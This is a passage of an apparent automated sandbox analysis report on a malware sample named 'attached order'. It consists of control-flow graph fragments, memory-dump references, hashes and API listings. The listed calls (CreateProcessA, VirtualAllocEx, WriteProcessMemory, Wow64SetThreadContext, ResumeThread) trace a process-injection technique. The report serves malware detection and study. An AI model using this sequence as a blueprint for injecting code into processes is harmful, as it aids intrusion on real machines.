5a37648 46997->47017 47021 5a37638 46997->47021 47025 5a383a8 46997->47025 47005 5a3768a 47003->47005 47004 5a376a2 47005->47004 47006 5a3626c CallWindowProcW 47005->47006 47007 5a3768f 47006->47007 47007->46996 47009 5a36277 47008->47009 47010 5a38419 47009->47010 47012 5a38409 47009->47012 47013 5a38417 47010->47013 47050 5a36394 47010->47050 47034 5a38530 47012->47034 47039 5a3860c 47012->47039 47045 5a38540 47012->47045 47018 5a3766e 47017->47018 47019 5a3626c CallWindowProcW 47018->47019 47020 5a3768f 47019->47020 47020->46996 47022 5a37648 47021->47022 47023 5a3626c CallWindowProcW 47022->47023 47024 5a3768f 47023->47024 47024->46996 47026 5a383b8 47025->47026 47027 5a38419 47026->47027 47029 5a38409 47026->47029 47028 5a36394 CallWindowProcW 47027->47028 47030 5a38417 47027->47030 47028->47030 47031 5a38530 CallWindowProcW 47029->47031 47032 5a38540 CallWindowProcW 47029->47032 47033 5a3860c CallWindowProcW 47029->47033 47031->47030 47032->47030 47033->47030 47036 5a38540 47034->47036 47035 5a385e0 47035->47013 47054 5a385e8 47036->47054 47058 5a385f8 47036->47058 47040 5a385ca 47039->47040 47041 5a3861a 47039->47041 47043 5a385e8 CallWindowProcW 47040->47043 47044 5a385f8 CallWindowProcW 47040->47044 47042 5a385e0 47042->47013 47043->47042 47044->47042 47047 5a38554 47045->47047 47046 5a385e0 47046->47013 47048 5a385e8 CallWindowProcW 47047->47048 47049 5a385f8 CallWindowProcW 47047->47049 47048->47046 47049->47046 47051 5a3639f 47050->47051 47052 5a39afa CallWindowProcW 47051->47052 47053 5a39aa9 47051->47053 47052->47053 47053->47013 47055 5a385f8 47054->47055 47056 5a38609 47055->47056 47061 5a39a3e 47055->47061 47056->47035 47059 5a38609 47058->47059 47060 5a39a3e CallWindowProcW 47058->47060 47059->47035 47060->47059 47062 5a36394 CallWindowProcW 47061->47062 47063 5a39a4a 47062->47063 47063->47056

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: <ov!
                                                                                          • API String ID: 0-3980319286
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "{r
                                                                                          • API String ID: 0-3231798924
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "{r
                                                                                          • API String ID: 0-3231798924
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 05A32D56
                                                                                          • GetCurrentThread.KERNEL32 ref: 05A32D93
                                                                                          • GetCurrentProcess.KERNEL32 ref: 05A32DD0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 05A32E29
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 05A32D56
                                                                                          • GetCurrentThread.KERNEL32 ref: 05A32D93
                                                                                          • GetCurrentProcess.KERNEL32 ref: 05A32DD0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 05A32E29
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 99 9e58440-9e58465 call 9e55edc 102 9e58467-9e58477 99->102 103 9e5847a-9e5850c CreateIconFromResourceEx 99->103 106 9e58515-9e58532 103->106 107 9e5850e-9e58514 103->107 107->106
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromIconResource
                                                                                          • String ID: eU
                                                                                          • API String ID: 3668623891-19612409

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Y0$<W0
                                                                                          • API String ID: 0-4290105809

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A320F6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A320F6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 05A30C9E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A375A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A375A2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          APIs
                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 05A39B21
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2714655100-0
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01ABB469
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01ABB469
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          APIs
                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09E5726F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: DrawText
                                                                                          • String ID:
                                                                                          • API String ID: 2175133113-0
                                                                                          APIs
                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 09E5726F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: DrawText
                                                                                          • String ID:
                                                                                          • API String ID: 2175133113-0
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A320B40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A320B40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A320C20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A320996
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A320C20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A320996
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05A32FA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05A32FA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          APIs
                                                                                          • FindWindowW.USER32(00000000,00000000), ref: 01ABF53E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16557339300.0000000001AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01AB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_1ab0000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindWindow
                                                                                          • String ID:
                                                                                          • API String ID: 134000473-0
                                                                                          APIs
                                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,09E5845A,?,?,?,?,?), ref: 09E584FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromIconResource
                                                                                          • String ID:
                                                                                          • API String ID: 3668623891-0
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A320A5E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A320A5E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 05A30C9E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16560737399.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5a30000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0A3231E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0A3231E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562593674.000000000A320000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A320000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a320000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: r
                                                                                          • API String ID: 0-1812594589
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: p-
                                                                                          • API String ID: 0-3944269765
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,09E5AA79,?,?), ref: 09E5AC20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,09E5AA79,?,?), ref: 09E5AC20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16561958916.0000000009E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E50000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_9e50000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Y0
                                                                                          • API String ID: 0-3716725488
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 652bc9740efa2fd99056ec772134bb96d897e35a494202fbf1d1ab90d82121fb
                                                                                          • Instruction ID: a78e0fd52e478be0783c249daa300b39e6896e7cd9894f7e57e0bbb18553b542
                                                                                          • Opcode Fuzzy Hash: 652bc9740efa2fd99056ec772134bb96d897e35a494202fbf1d1ab90d82121fb
                                                                                          • Instruction Fuzzy Hash: 9F314571949388AFCF01EFADD9107EEBFF5EF81310F24849AD409A7242CA344909CB61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc6ed3e2bc6e55233d7b1133e7ace59faf4c0332c416e97f529edfbb1c782e04
                                                                                          • Instruction ID: 8707e201da9fb48a551d418dd4e40ebc92b9f5a7e04b13068ec9ddbc0e114f8d
                                                                                          • Opcode Fuzzy Hash: fc6ed3e2bc6e55233d7b1133e7ace59faf4c0332c416e97f529edfbb1c782e04
                                                                                          • Instruction Fuzzy Hash: 81414774E09208DFCF04EFA9D854AEEBBB6FF98310F108469E515A7394D7345941CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9f5edee570dfcab4d141aa5b20f9fddfb55f33955c92be67324ec606fbc903c6
                                                                                          • Instruction ID: 94eed2ecffe733fa9764eb75ced122f4314b9d682a52a5da6158f18f9fd2e9c6
                                                                                          • Opcode Fuzzy Hash: 9f5edee570dfcab4d141aa5b20f9fddfb55f33955c92be67324ec606fbc903c6
                                                                                          • Instruction Fuzzy Hash: 91415874E09248DFCF04EFA9D8446EEBBB2FF99300F1484AAE415A7291D7345945CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ccd64571b552b6bdb10b57e77f561ff66ec14c9e264fee7c672066a7e502b96e
                                                                                          • Instruction ID: 1ca045367ddc7d5d241300aba5bae8798d68a2c20cdc98d09aa00d82023ba906
                                                                                          • Opcode Fuzzy Hash: ccd64571b552b6bdb10b57e77f561ff66ec14c9e264fee7c672066a7e502b96e
                                                                                          • Instruction Fuzzy Hash: CB313A71A04248AFCF14DFA9D844ADEBFF9EB48320F10806AE815E7310D775A954CFA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.16562895453.000000000BA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ba70000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 82c240beafaa3c3a28ea9a40eb6356f9ab8646b0723f8fe2054743a1bb9d1b9b
                                                                                          • Instruction ID: 17ee1dc589b5f18f5c7aafa6962e9cb55fbd500b7e54589382096caa63221b8a
                                                                                          • Opcode Fuzzy Hash: 82c240beafaa3c3a28ea9a40eb6356f9ab8646b0723f8fe2054743a1bb9d1b9b
                                                                                          • Instruction Fuzzy Hash: 40310774E082588FDB04DFAAC9406EEBBF6FF89300F14812AD419A7396DB345906CF50
                                                                                          Memory Dump Source
